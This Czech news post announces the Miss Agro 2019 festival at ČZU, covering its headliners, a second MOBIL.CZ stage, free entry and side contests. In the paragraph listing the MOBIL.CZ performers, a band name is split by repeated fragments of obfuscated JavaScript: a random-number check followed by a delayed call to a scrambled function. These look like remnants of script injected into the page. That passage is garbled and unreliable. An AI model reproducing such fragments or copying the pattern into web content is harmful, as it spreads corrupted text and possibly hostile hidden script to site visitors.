Během posledních týdnů byl na sociálních sítích Miss Agro postupně odtajněn line-up Miss Agro 2019. Vzhledem k tomu, že letošní hudební účast je opravdu nabitá nebude o zábavu nouze. Kromě programu na hlavní stage, která zůstává klasicky vedle Kruhové haly ČZU, se návštěvníci zabaví také na speciální MOBIL.CZ stage.

 

Headlinerem letošního ročníku se stala slovenská skupina No Name. Dalšími velkými jmény na hlavní stage budou UDG a Prago Union, které doplní kapely Faraday a Lety Mimo. V mezičasech Vás zabaví samotné finalistky Miss Agro 2019, které budou bojovat o korunku v několika disciplínách. O vítězce soutěže se posléze rozhodne ve večerních hodinách – po závěrečném defilé v šatech za doprovodu zpěvu Jana Nedvěda, známého pod pseudonymem JEN.

Vedlejší MOBIL.CZ stage Vám kromě DJ’s – Roxtara, Zeekeho a Lowy, nabídne také vystoupení Vojtaana a kapel Hdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and Grenade a JEN. K programu si budete určitě moci užít i krásné hostesky a soutěže o skvělé ceny.

Kromě celého programu Miss Agro nepřijdete ani o doplňkové stánky s občerstvením. Celá akce začíná ve 14. 5. 2019 ve 14 hodin a vstup je již tradičně ZDARMA.

Kompletní program Miss Agro 2019

 

Stále můžete také hlasovat ve dvou doprovodných kateriích Miss Agro 2019 a to Miss Sympatie MOBIL.CZ a také Miss iZUN.

 

Sdílej článek